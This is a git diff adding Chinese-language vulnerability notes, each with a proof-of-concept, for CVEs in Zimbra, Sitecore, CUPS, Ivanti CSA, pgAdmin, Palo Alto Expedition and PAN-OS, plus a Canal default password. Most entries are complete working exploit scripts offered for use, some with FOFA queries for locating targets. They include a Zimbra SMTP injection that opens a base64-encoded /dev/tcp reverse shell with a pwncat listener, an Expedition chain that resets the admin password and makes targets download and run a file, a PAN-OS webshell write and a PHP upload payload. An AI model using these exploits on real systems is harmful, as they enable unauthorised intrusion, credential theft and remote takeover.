+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: qscms_visitor=%7B%22utype%22%3A1%2C%22mobile%22%3A%2215212345678%22%2C%22token%22%3A%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ%22%7D
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+imgBase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
+```
+
+![image-20250206164242391](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061642460.png)
+
+
+
+## 漏洞来源
+
+- https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a
\ No newline at end of file
diff --git a/CVE-2024-45519.md b/CVE-2024-45519.md
new file mode 100644
index 0000000..a68b103
--- /dev/null
+++ b/CVE-2024-45519.md
@@ -0,0 +1,183 @@
+# Zimbra远程命令执行漏洞(CVE-2024-45519)
+
+CVE-2024-45519 是 Zimbra Collaboration (ZCS) 中的一个漏洞，Zimbra Collaboration (ZCS) 8.8.15 补丁 46 之前的版本、9.0.0 补丁 41 之前的 9、10.0.9 之前的 10 以及 10.1.1 之前的 10.1 中的期刊后服务有时允许未经身份验证的用户执行命令。
+
+## fofa
+
+```javascript
+icon_hash="1624375939"
+```
+
+## poc
+
+```python
+import time
+import base64
+import socket
+import threading
+import pwncat.manager
+import rich_click as click
+
+from pwn import *
+from faker import Faker
+
+
+class SMTPExploit:
+    def __init__(self, target, port, lhost, lport):
+        self.target = target
+        self.port = port
+        self.lhost = lhost
+        self.lport = lport
+        self.mail_from = self.generate_random_email()
+        self.rcpt_to = self.generate_random_email()
+        self.sock = None
+        self.command = self.generate_base64_revshell()
+
+    def generate_random_email(self):
+        fake = Faker()
+        return fake.email()
+
+    def generate_base64_revshell(self):
+        revshell = f"/bin/bash -i 5<> /dev/tcp/{self.lhost}/{self.lport} 0<&5 1>&5 2>&5"
+        base64_revshell = base64.b64encode(revshell.encode()).decode()
+
+        payload = f"echo${{IFS}}{base64_revshell}|base64${{IFS}}-d|bash"
+        return payload
+
+    def generate_injected_rcpt_to(self):
+        return f'"aabbb$({self.command})@{self.rcpt_to}"'
+
+    def connect(self):
+        try:
+            self.sock = remote(self.target, self.port)
+            banner = self.sock.recv(4096)
+            log.info(f"Banner received: {banner.decode().strip()}")
+        except Exception as e:
+            log.error(f"Failed to connect to SMTP server: {e}")
+            self.clean_exit()
+
+    def send_smtp_command(self, command):
+        try:
+            self.sock.sendline(command.encode())
+            response = self.sock.recv(4096).decode().strip()
+            log.info(f"Response: {response}")
+            return response
+        except EOFError:
+            log.error("Connection closed by the server.")
+            self.clean_exit()
+        except Exception as e:
+            log.error(f"Error sending command '{command}': {e}")
+            self.clean_exit()
+
+    def clean_exit(self):
+        """Close the socket and stop the listener in case of failure"""
+        if self.sock:
+            self.sock.close()
+            log.info("Connection closed")
+        listener.listener_event.set()
+        log.error("Exploitation failed, exiting.")
+        exit(1)
+
+    def run(self):
+        log.info(f"Connecting to SMTP server {self.target}:{self.port}...")
+        self.connect()
+
+        self.send_smtp_command("EHLO localhost")
+
+        self.send_smtp_command(f"MAIL FROM: <{self.mail_from}>")
+
+        injected_rcpt_to = self.generate_injected_rcpt_to()
+        self.send_smtp_command(f"RCPT TO: <{injected_rcpt_to}>")
+
+        self.send_smtp_command("DATA")
+
+        self.sock.sendline("Test message".encode())
+        self.sock.sendline(".".encode())
+        data_response = self.sock.recv(4096).decode().strip()
+        log.info(f"Response after data: {data_response}")
+
+        self.send_smtp_command("QUIT")
+
+        self.sock.close()
+        log.success("Exploitation completed successfully!")
+
+
+class Listener:
+    def __init__(self, bind_host, bind_port):
+        self.bind_host = bind_host
+        self.bind_port = bind_port
+
+    def start_listener(self):
+        try:
+            with socket.create_server((self.bind_host, self.bind_port)) as listener:
+                log.info(f"Listening on {self.bind_host}:{self.bind_port}...")
+                listener.settimeout(1)
+                while True:
+                    try:
+                        client, addr = listener.accept()
+                        log.success(f"Received connection from {addr[0]}:{addr[1]}")
+                        with pwncat.manager.Manager() as manager:
+                            manager.create_session(
+                                platform="linux", protocol="socket", client=client
+                            )
+                            manager.interactive()
+                        break
+                    except socket.timeout:
+                        continue
+        except Exception as e:
+            log.error(f"Failed to start listener: {e}")
+
+
+@click.command()
+@click.argument("target")
+@click.option(
+    "-p",
+    "--port",
+    type=int,
+    default=25,
+    show_default=True,
+    help="SMTP port (default: 25)",
+)
+@click.option(
+    "-lh",
+    "--lhost",
+    default="0.0.0.0",
+    show_default=True,
+    help="Local host for listener",
+)
+@click.option(
+    "-lp",
+    "--lport",
+    type=int,
+    default=4444,
+    show_default=True,
+    help="Local port for listener",
+)
+def main(target, port, lhost, lport):
+    """Exploit the Zimbra Postjournal SMTP vulnerability to execute arbitrary commands."""
+    listener = Listener(lhost, lport)
+    listener_thread = threading.Thread(target=listener.start_listener)
+    listener_thread.start()
+
+    time.sleep(1)
+
+    exploit = SMTPExploit(target, port, lhost, lport)
+    try:
+        exploit.run()
+    except Exception as e:
+        log.error(f"An error occurred during the exploit: {e}")
+
+    listener_thread.join()
+
+
+if __name__ == "__main__":
+    main()
+```
+
+![zimbra_rce](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410061540218.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/Chocapikk/CVE-2024-45519
\ No newline at end of file
diff --git a/CVE-2024-46938.md b/CVE-2024-46938.md
new file mode 100644
index 0000000..add6f96
--- /dev/null
+++ b/CVE-2024-46938.md
@@ -0,0 +1,213 @@
+# Sitecore未授权读取任意文件(CVE-2024-46938)
+
+在 Sitecore Experience Platform (XP)、Experience Manager (XM) 和 Experience Commerce (XC) 8.0 初始版本至 10.4 初始版本中发现了问题。未经身份验证的攻击者可以读取任意文件。
+
+## poc
+
+```python
+import argparse
+import requests
+import tldextract
+import urllib3
+import re
+from tqdm import tqdm
+from concurrent.futures import ThreadPoolExecutor, as_completed
+from datetime import datetime
+from typing import List, Optional
+
+urllib3.disable_warnings()
+
+class FileDisclosureScanner:
+    def __init__(self):
+        self.results = []
+        self.fixed_paths = [
+            r"C:\\inetpub\\wwwroot\\sitecore\\",
+            r"C:\\inetpub\\wwwroot\\sitecore1\\",
+            r"C:\\inetpub\\wwwroot\\sxa\\",
+            r"C:\\inetpub\\wwwroot\\XP0.sc\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore82\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore81\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore81u2\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore7\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore8\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore70\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore71\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore72\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore75\\",
+            r"C:\\Websites\\spe.dev.local\\",
+            r"C:\\inetpub\\wwwroot\\SitecoreInstance\\",
+            r"C:\\inetpub\\wwwroot\\SitecoreSPE_8\\",
+            r"C:\\inetpub\\wwwroot\\SitecoreSPE_91\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore9\\",
+            r"C:\\inetpub\\wwwroot\\sitecore93sc.dev.local\\",
+            r"C:\\inetpub\\wwwroot\\Sitecore81u3\\",
+            r"C:\\inetpub\\wwwroot\\sitecore9.sc\\",
+            r"C:\\inetpub\\wwwroot\\sitecore901xp0.sc\\",
+            r"C:\\inetpub\\wwwroot\\sitecore9-website\\",
+            r"C:\\inetpub\\wwwroot\\sitecore93.sc\\",
+            r"C:\\inetpub\\wwwroot\\SitecoreSite\\",
+            r"C:\\inetpub\\wwwroot\\sc82\\",
+            r"C:\\inetpub\\wwwroot\\SX93sc.dev.local\\",
+            r"C:\\inetpub\\SITECORE.sc\\",
+            r"C:\\inetpub\\wwwroot\\"
+        ]
+        
+    def attempt_absolute_path_leak(self, base_url: str) -> Optional[str]:
+        """Attempt to discover absolute path through POST request."""
+        path_discovery_endpoint = f"{base_url}/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a"
+        headers = {
+            "Accept": "*/*",
+            "Accept-Encoding": "gzip, deflate, br",
+            "Accept-Language": "en-US;q=0.9,en;q=0.8",
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36",
+            "Connection": "close",
+            "Cache-Control": "max-age=0",
+            "Content-Type": "application/x-www-form-urlencoded"
+        }
+        data = "__PAGESTATE=/../../x/x"
+
+        try:
+            response = requests.post(path_discovery_endpoint, headers=headers, data=data, verify=False, timeout=5)
+            if response.status_code == 500:
+                match = re.search(r"Could not find a part of the path '([^']+)'", response.text)
+                if match:
+                    absolute_path = match.group(1)
+                    print(f"[+] Discovered absolute path for {base_url}: {absolute_path}")
+                    return absolute_path
+        except requests.RequestException:
+            pass
+        return None
+
+    def generate_dynamic_paths(self, base_url: str) -> List[str]:
+        """Generate dynamic paths based on URL components."""
+        extracted = tldextract.extract(base_url)
+        subdomain = extracted.subdomain
+        domain = extracted.domain
+        suffix = extracted.suffix
+        fqdn = f"{subdomain}.{domain}.{suffix}".strip(".")
+        
+        return [
+            fr"C:\\inetpub\\{domain}.sc\\",
+            fr"C:\\inetpub\\{fqdn}.sc\\",
+            fr"C:\\inetpub\\{subdomain}.sc\\",
+            fr"C:\\inetpub\\{fqdn}\\",
+            fr"C:\\inetpub\\{subdomain}\\",
+            fr"C:\\inetpub\\{domain}\\",
+            fr"C:\\inetpub\\{domain}.sitecore\\",
+            fr"C:\\inetpub\\{fqdn}.sitecore\\",
+            fr"C:\\inetpub\\{subdomain}.sitecore\\",
+            fr"C:\\inetpub\\{domain}.website\\",
+            fr"C:\\inetpub\\{fqdn}.website\\",
+            fr"C:\\inetpub\\{subdomain}.website\\",
+            fr"C:\\inetpub\\{domain}.dev.local\\",
+            fr"C:\\inetpub\\{fqdn}.dev.local\\",
+            fr"C:\\inetpub\\{subdomain}.dev.local\\",
+            fr"C:\\inetpub\\{domain}sc.dev.local\\",
+            fr"C:\\inetpub\\{fqdn}sc.dev.local\\",
+            fr"C:\\inetpub\\{subdomain}sc.dev.local\\"
+        ]
+
+    def send_request(self, base_url: str, path: str, progress_bar: tqdm) -> Optional[dict]:
+        """Send request to check for vulnerability."""
+        test_path = f"{path}sitecore\\shell\\client\\..\\..\\..\\web.config%23.js"
+        payload_url = f"{base_url}/-/speak/v1/bundles/bundle.js?f={test_path}"
+        
+        try:
+            response = requests.get(payload_url, verify=False, timeout=5)
+            if response.status_code == 200 and "<?xml version=" in response.text and "<configuration>" in response.text:
+                result = {
+                    "url": base_url,
+                    "path": path,
+                    "content": response.text
+                }
+                self.results.append(result)
+                return result
+        except requests.RequestException:
+            pass
+        finally:
+            progress_bar.update(1)
+        return None
+
+    def process_url(self, base_url: str, progress_bar: tqdm) -> None:
+        """Process a single URL."""
+        leaked_path = self.attempt_absolute_path_leak(base_url)
+        
+        if leaked_path:
+            leaked_path = leaked_path.replace("x\\x.txt", "")
+            paths_to_test = [leaked_path] + self.generate_dynamic_paths(base_url)
+        else:
+            paths_to_test = self.fixed_paths + self.generate_dynamic_paths(base_url)
+
+        with ThreadPoolExecutor(max_workers=5) as executor:
+            futures = [executor.submit(self.send_request, base_url, path, progress_bar) 
+                      for path in paths_to_test]
+            for future in as_completed(futures):
+                future.result()
+
+    def save_results(self, output_file: str) -> None:
+        """Save results to file."""
+        if self.results:
+            with open(output_file, "w") as f:
+                for result in self.results:
+                    f.write(f"URL: {result['url']}\n")
+                    f.write(f"Path: {result['path']}\n")
+                    f.write(f"Extracted File:\n{result['content']}\n\n")
+
+    def print_results(self) -> None:
+        """Print all found results."""
+        if self.results:
+            print("\n[+] Successfully exploited CVE-2024-46938 and obtained web.config:")
+            for result in self.results:
+                print(f"\nTarget: {result['url']}")
+                print(f"Local Path: {result['path']}")
+                print("-" * 50)
+
+def main():
+    parser = argparse.ArgumentParser(description="Test for absolute path disclosure vulnerability.")
+    parser.add_argument("--baseurl", help="Base URL of the target (e.g., https://example.com)")
+    parser.add_argument("--inputfile", help="File containing a list of URLs, one per line")
+    args = parser.parse_args()
+
+    urls = []
+    if args.baseurl:
+        urls.append(args.baseurl)
+    elif args.inputfile:
+        with open(args.inputfile, "r") as file:
+            urls = [line.strip() for line in file if line.strip()]
+    else:
+        parser.error("Either --baseurl or --inputfile must be provided")
+
+    scanner = FileDisclosureScanner()
+    timestamp = datetime.now().strftime("%Y%m%d-%H%M%S")
+    output_file = f"output-{timestamp}.txt"
+
+    # Calculate total requests for progress bar
+    total_requests = len(urls) * (len(scanner.fixed_paths) + len(scanner.generate_dynamic_paths(urls[0])))
+
+    with tqdm(total=total_requests, desc="Scanning", unit="request") as progress_bar:
+        with ThreadPoolExecutor(max_workers=10) as main_executor:
+            futures = {main_executor.submit(scanner.process_url, url, progress_bar): url 
+                      for url in urls}
+            for future in as_completed(futures):
+                future.result()
+
+    if scanner.results:
+        scanner.save_results(output_file)
+        print(f"\n[+] Found {len(scanner.results)} vulnerable targets")
+        print(f"[+] Results saved to: {output_file}")
+        scanner.print_results()
+    else:
+        print("\n[-] No vulnerabilities found")
+
+if __name__ == "__main__":
+    main()
+```
+
+
+
+
+
+## 漏洞来源
+
+- https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x
+- https://nvd.nist.gov/vuln/detail/CVE-2024-46938
\ No newline at end of file
diff --git a/CVE-2024-47177.md b/CVE-2024-47177.md
new file mode 100644
index 0000000..a57602b
--- /dev/null
+++ b/CVE-2024-47177.md
@@ -0,0 +1,64 @@
+# OpenPrinting Cups-Browsed PDD FoomaticRIPCommandLine 参数导致远程命令执行漏洞（CVE-2024-47177）
+
+OpenPrinting CUPS（通用Unix打印系统）是为类Unix操作系统开发的开源打印系统。它允许计算机充当打印服务器，高效管理本地和网络打印机。Cups-Browsed是CUPS系统的一部分，是一个专门用于浏览网络上其他CUPS服务器共享的远程打印机的守护进程。它可以自动发现和配置网络打印机，让用户更容易访问和使用网络上共享的打印资源，无需手动设置。
+
+在Cups-Browsed 2.0.1及之前的版本中，存在一个由PPD（PostScript打印机描述）文件中的`FoomaticRIPCommandLine`参数处理不当引起的问题。攻击者可以通过创建一个恶意的IPP（互联网打印协议）服务器来利用这个漏洞，向易受攻击的Cups-Browsed实例发送精心制作的打印机信息，然后在运行易受攻击的Cups-Browsed的系统上执行任意命令。
+
+参考链接：
+
+- <https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/>
+- <https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8>
+
+## 漏洞环境
+
+执行如下命令启动一个2.4.7版本CUPS服务器和2.0.1版本Cups-Browsed服务器：
+
+```
+docker-compose up -d
+```
+
+环境启动后，可以通过`http://<your-ip>:631`访问CUPS的web界面。
+
+漏洞环境来源：https://github.com/vulhub/vulhub
+
+## 漏洞复现
+
+首先，下载[evil-ipp-server](https://github.com/vulhub/evil-ipp-server)项目并运行[poc.py](https://github.com/vulhub/evil-ipp-server/blob/master/poc.py):
+
+```
+python poc.py [evil-ipp-server-ip] [target-ip]
+```
+
+这个脚本会在`[evil-ipp-server-ip]`上启动一个恶意的IPP服务器，并向目标机器`[target-ip]`上的Cups-Browsed服务发送一个UDP数据包。
+
+一旦Cups-Browsed接收到请求，它将尝试连接到恶意的IPP服务器并。IPP服务器会返回精心构造的`printer-privacy-policy-uri`属性，该属性中包含恶意payload，其结构如下：
+
+```python
+(
+    SectionEnum.printer,
+    b'printer-privacy-policy-uri',
+    TagEnum.uri
+): [b'https://www.google.com/"\n*FoomaticRIPCommandLine: "' +
+    b'echo 1 > /tmp/I_AM_VULNERABLE' +
+    b'"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'],
+```
+
+然后，Cups-Browsed会在`/tmp/`目录下创建一个临时PPD文件，我们的payload会被注入到这个文件中。下图是相关的Cups-Browsed日志：
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290934881.png)
+
+此时，命令还未执行，因为我们需要至少一个打印任务来触发命令的执行。
+
+打印任务可能来自于正常用户，也可以来自攻击者。如果TCP 631端口开发，我们可以使用浏览器访问，并找到刚才增加的恶意IPP打印机，并创建一个“打印测试页面”的打印任务。
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290934786.png)
+
+任务执行后，进入容器即可发现，`echo 1 > /tmp/I_AM_VULNERABLE`命令已经成功执行：
+
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290934588.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/vulhub/vulhub/blob/master/cups-browsed/CVE-2024-47177/README.zh-cn.md
\ No newline at end of file
diff --git a/CVE-2024-8190.md b/CVE-2024-8190.md
new file mode 100644
index 0000000..6fd10a5
--- /dev/null
+++ b/CVE-2024-8190.md
@@ -0,0 +1,65 @@
+# Ivanti Cloud Service Appliance存在命令注入漏洞(CVE-2024-8190)
+
+Ivanti Cloud Service Appliance 4.6 Patch 519之前版本中存在命令注入漏洞，由于解析HTTP请求时对TIMEZONE请求参数缺乏适当的输入验证和清理，导致恶意输入可以被exec()函数执行，从而导致命令注入，经过身份验证且拥有管理员权限的威胁者可利用该漏洞远程执行任意命令。
+
+## poc
+
+```python
+#!/usr/bin/python3
+import argparse
+import re
+import requests
+import sys
+import urllib3
+from requests.auth import HTTPBasicAuth
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+
+def exploit(url, username, password, command):
+    u = username
+    p = password
+    s = requests.Session()
+    r = s.get(f"{url}/gsb/datetime.php", auth=HTTPBasicAuth(u,p), verify=False)
+    m = re.search(r"name=['\"]LDCSA_CSRF['\"]\s+value=['\"]([^'\"]+)['\"]", r.text)
+    if m:
+        ldcsa = m.group(1)
+        print(f"[+] Got LDCSA_CSRF value: {ldcsa}")
+    else:
+        print(f"[-] Failed getting LDCSA_CRSF token")
+        sys.exit(0)
+
+    payload = {
+        "dateTimeFormSubmitted": "1",
+        "TIMEZONE": f"; `{command}` ;",
+        "CYEAR": "2024",
+        "CMONTH": "9",
+        "CDAY": "13",
+        "CHOUR": "12",
+        "CMIN": "34",
+        "LDCSA_CSRF": ldcsa,
+        "SUBMIT_TIME": "Save"
+    }
+    print(f"[*] Sending payload...")
+    r = s.post(f"{url}/gsb/datetime.php", auth=HTTPBasicAuth(u,p), verify=False, data=payload)
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', help='The base URL of the target', required=True)
+    parser.add_argument('--username', help='The application username', required=True)
+    parser.add_argument('--password', help='The application password', required=True)
+    parser.add_argument('-c', '--command', help='The command to execute blind', type=str, required=True)
+    args = parser.parse_args()
+
+    exploit(args.url, args.username, args.password, args.command)
+```
+
+
+
+
+
+## 漏洞来源
+
+- https://www.horizon3.ai/attack-research/cisa-kev-cve-2024-8190-ivanti-csa-command-injection/
+- https://github.com/lal0ne/vulnerability/tree/main/Ivanti/CVE-2024-8190
\ No newline at end of file
diff --git a/CVE-2024-9014.md b/CVE-2024-9014.md
new file mode 100644
index 0000000..4f889ee
--- /dev/null
+++ b/CVE-2024-9014.md
@@ -0,0 +1,25 @@
+# pgAdmin4敏感信息泄露漏洞(CVE-2024-9014)
+
+CVE-2024-9014 pgAdmin4 敏感信息泄露 ，pgAdmin 版本 8.11 及更早版本容易受到 OAuth2 身份验证中的安全缺陷的影响。此漏洞允许攻击者获取客户端 ID 和机密，从而导致对用户数据的未经授权的访问。
+
+## fofa
+
+```javascript
+icon_hash="1502815117"
+```
+
+## poc
+
+```javascript
+GET /login?next=/ HTTP/1.1
+Host: 192.168.31.135:5050
+
+```
+
+![1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410061603750.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/EQSTLab/CVE-2024-9014
\ No newline at end of file
diff --git a/CVE-2024-9464.md b/CVE-2024-9464.md
new file mode 100644
index 0000000..c9b9b60
--- /dev/null
+++ b/CVE-2024-9464.md
@@ -0,0 +1,139 @@
+# Palo-Alto-Expedition经过身份验证的命令注入(CVE-2024-9464)
+
+Palo Alto Networks Expedition 中的操作系统命令注入漏洞允许经过身份验证的攻击者以 Expedition 中的 root 身份运行任意操作系统命令，从而导致用户名、明文密码、设备配置和 PAN-OS 防火墙的设备 API 密钥泄露。
+
+## poc
+
+```python
+#!/usr/bin/python3
+import argparse
+import requests
+import urllib3
+import random
+import string
+import sys
+import socketserver
+import time
+import threading
+from http.server import SimpleHTTPRequestHandler
+from requests.exceptions import ReadTimeout
+urllib3.disable_warnings()
+
+def _start_web_server(listen_ip, listen_port):
+    try:
+        httpd = socketserver.TCPServer((listen_ip, listen_port), SimpleHTTPRequestHandler)
+        httpd.timeout = 60
+        httpd.serve_forever()
+    except Exception as e:
+        sys.stderr.write(f'[!] Error starting web server: {e}\n')
+
+def serve():
+    print(f'[*] Starting web server at {args.listen_ip}:{args.listen_port}')
+    ft = threading.Thread(target=_start_web_server, args=(args.listen_ip,args.listen_port), daemon=True)
+    ft.start()
+    time.sleep(3)
+
+def reset_admin_password(url: str):
+    print(f'[*] Sending reset request to server...')
+    r = requests.post(f'{url}/OS/startup/restore/restoreAdmin.php', verify=False, timeout=30)
+    if r.status_code == 200:
+        print(f'[*] Admin password reset successfully')
+    else:
+        print(f'[-] Unexpected response during reset: {r.status_code}:{r.text}')
+        sys.exit(1)
+
+
+def get_session_key(url: str):
+    print(f'[*] Retrieving session key...')
+    session = requests.Session()
+    data = {'action': 'get',
+            'type': 'login_users',
+            'user': 'admin',
+            'password': 'paloalto',
+            }
+    r = session.post(f'{url}/bin/Auth.php', data=data, verify=False, timeout=30)
+    if r.status_code == 200:
+        session_key = r.headers.get('Set-Cookie')
+        if 'PHPSESSID' in session_key:
+            print(f'[*] Session key successfully retrieved')
+            csrf_token = r.json().get('csrfToken')
+            session.headers['Csrftoken'] = csrf_token
+            return session
+
+    print(f'[-] Unexpected response during authentication: {r.status_code}:{r.text}')
+    sys.exit(1)
+
+
+def add_blank_cronjob(url: str, session):
+    print(f'[*] Adding empty cronjob database entry...')
+    data = {'action': 'add',
+            'type': 'new_cronjob',
+            'project': 'pandb',
+            }
+    r = session.post(f'{url}/bin/CronJobs.php', data=data, verify=False, timeout=30)
+    if r.status_code == 200 and r.json().get('success', False):
+        print(f'[*] Successfully added cronjob database entry')
+        return
+
+    print(f'[-] Unexpected response adding cronjob: {r.status_code}:{r.text}')
+    sys.exit(1)
+
+
+def edit_cronjob(url, session, command):
+    print(f'[*] Inserting: {command}')
+    print(f'[*] Inserting malicious command into cronjob database entry...')
+    data = {'action': 'set',
+            'type': 'cron_jobs',
+            'project': 'pandb',
+            'name': 'test',
+            'cron_id': '1',
+            'recurrence': 'Daily',
+            'start_time': f'"; {command} ;',
+            }
+    try:
+        r = session.post(f'{url}/bin/CronJobs.php', data=data, verify=False, timeout=30)
+        if r.status_code == 200:
+            print(f'[+] Successfully edited cronjob - check for blind execution!')
+            return
+
+        print(f'[-] Unexpected response editing cronjob: {r.status_code}:{r.text}')
+        sys.exit(1)
+    except TimeoutError:
+        # Expected to timeout given it keeps connection open for process duration
+        pass
+    except ReadTimeout:
+        # Expected to timeout given it keeps connection open for process duration
+        pass
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)
+    parser.add_argument('-c', '--cmd_file', help='The commands to execute blind', type=str, required=True)
+    parser.add_argument('-li', '--listen_ip', help='local IP to bind to')
+    parser.add_argument('-lp', '--listen_port', required=False, help='local HTTP port to bind to, for blind RCE mode', default=8000, type=int)
+    args = parser.parse_args()
+
+    serve()
+    reset_admin_password(args.url)
+    session = get_session_key(args.url)
+    add_blank_cronjob(args.url, session)
+    filename = random.choice(string.ascii_letters)
+    cmd_wrapper = [
+        f'wget {args.listen_ip}$(echo $PATH|cut -c16){args.listen_port}/{args.cmd_file} -O /tmp/{filename}',
+        f'chmod 777 /tmp/{filename}',
+        f'/tmp/{filename}',
+        f'rm /tmp/{filename}'
+    ]
+    for cmd in cmd_wrapper:
+        edit_cronjob(args.url, session, cmd)
+        time.sleep(1)
+
+
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/horizon3ai/CVE-2024-9464
\ No newline at end of file
diff --git a/CVE-2024-9474.md b/CVE-2024-9474.md
new file mode 100644
index 0000000..bfb8d5e
--- /dev/null
+++ b/CVE-2024-9474.md
@@ -0,0 +1,118 @@
+# PAN-OS软件中存在权限提升漏洞(CVE-2024-9474/CVE-2024-0012)
+
+Palo Alto Networks PAN-OS 软件中存在权限提升漏洞，允许有权访问管理 Web 界面的 PAN-OS 管理员以 root 权限在防火墙上执行操作。 Cloud NGFW 和 Prisma Access 不受此漏洞影响。
+
+## fofa
+
+```javascript
+icon_hash="873381299"
+```
+
+## poc
+
+```python
+import requests
+import argparse
+import urllib3
+import base64
+
+
+# Set up command-line argument parsing
+parser = argparse.ArgumentParser(description="Send a POST request with a specified hostname.")
+parser.add_argument("hostname", help="The hostname to be used in the request.")
+parser.add_argument("command", help="Command to execute")
+args = parser.parse_args()
+
+
+# Assign the hostname variable
+hostname = args.hostname
+#lhost = args.lip
+#lport = args.lport
+command = args.command
+
+# Define the proxy configuration
+proxies = {
+    "http": "http://localhost:8080",
+    "https": "http://localhost:8080",
+}
+
+proxies = "" # comment line to go through the Burp Proxy
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+# Define the URL and headers
+url = f"https://{hostname}/php/utils/createRemoteAppwebSession.php/watchTowr.js.map"
+header1 = {
+    "Host": hostname,
+    "X-PAN-AUTHCHECK": "off",
+    "Content-Type": "application/x-www-form-urlencoded",
+}
+
+# Define the payload
+payload_new = (
+    "user=`"+str(command)+"`"
+    "&userRole=superuser&remoteHost=&vsys=vsys1"
+)
+
+
+payload_orig = (
+    "user=`echo $("+str(command)+") > /var/appweb/htdocs/unauth/watchTowr.php`"
+    "&userRole=superuser&remoteHost=&vsys=vsys1"
+)
+
+print("POST : " + url)
+try:
+    #print(payload)
+    response = requests.post(url, headers=header1, data=payload_orig, proxies=proxies, verify=False)
+    print("Status Code:", response.status_code)
+    if 'Set-Cookie' in response.headers and response.status_code == 200 :
+        set_cookie = response.headers['Set-Cookie']
+
+        # Look for the PHPSESSID in the Set-Cookie header
+        if 'PHPSESSID=' in set_cookie:
+            # Extract the PHPSESSID value
+            phpsessid = set_cookie.split('PHPSESSID=')[1].split(';')[0]
+            print(f"PHPSESSID: {phpsessid}")
+        else:
+            print("PHPSESSID not found in Set-Cookie header")
+    else:
+        print("'Set-Cookie' header not found in response headers")
+    print()
+except requests.RequestException as e:
+    print("An error occurred:", e)
+
+header2 = {
+    "Host": hostname,
+    "Cookie": f"PHPSESSID={phpsessid};",
+    "X-PAN-AUTHCHECK": "off",
+    "Connection": "keep-alive"
+}
+url2 = f"https://{hostname}/index.php/.js.map"
+
+print("GET : " + url2)
+try:
+    response2 = requests.get(url2, headers=header2, proxies=proxies, verify=False)
+    print("Status Code:", response2.status_code)
+    print()
+except requests.RequestException as e:
+    print("An error occurred:", e)
+
+
+url3 = f"https://{hostname}/unauth/watchTowr.php"
+
+print("GET : " + url3)
+try:
+    response3 = requests.get(url3, headers=header2, proxies=proxies, verify=False)
+    print("Status Code:", response3.status_code)
+    print("Status Content:", response3.content)
+
+except requests.RequestException as e:
+    print("An error occurred:", e)
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/k4nfr3/CVE-2024-9474/blob/main/exploit_fw.py
+- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/?123
\ No newline at end of file
diff --git a/Canal存在弱口令漏洞.md b/Canal存在弱口令漏洞.md
new file mode 100644
index 0000000..5ed6838
--- /dev/null
+++ b/Canal存在弱口令漏洞.md
@@ -0,0 +1,19 @@
+# Canal存在弱口令漏洞
+
+### 一、漏洞描述
+Canal存在弱口令漏洞
+
+### 二、影响版本
+![1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466.png](./img/m36C284UAgWGI0RR/1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466-071730.png)
+
+### 三、漏洞复现
+```plain
+admin/123456
+```
+
+![1724655456857-34ce2e5a-a0f9-4e50-9cf4-e6d8040556fa.png](./img/m36C284UAgWGI0RR/1724655456857-34ce2e5a-a0f9-4e50-9cf4-e6d8040556fa-735011.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cv3qnabuw4alcc0i>
\ No newline at end of file
diff --git a/Canal存在敏感信息泄露漏洞.md b/Canal存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..2a37040
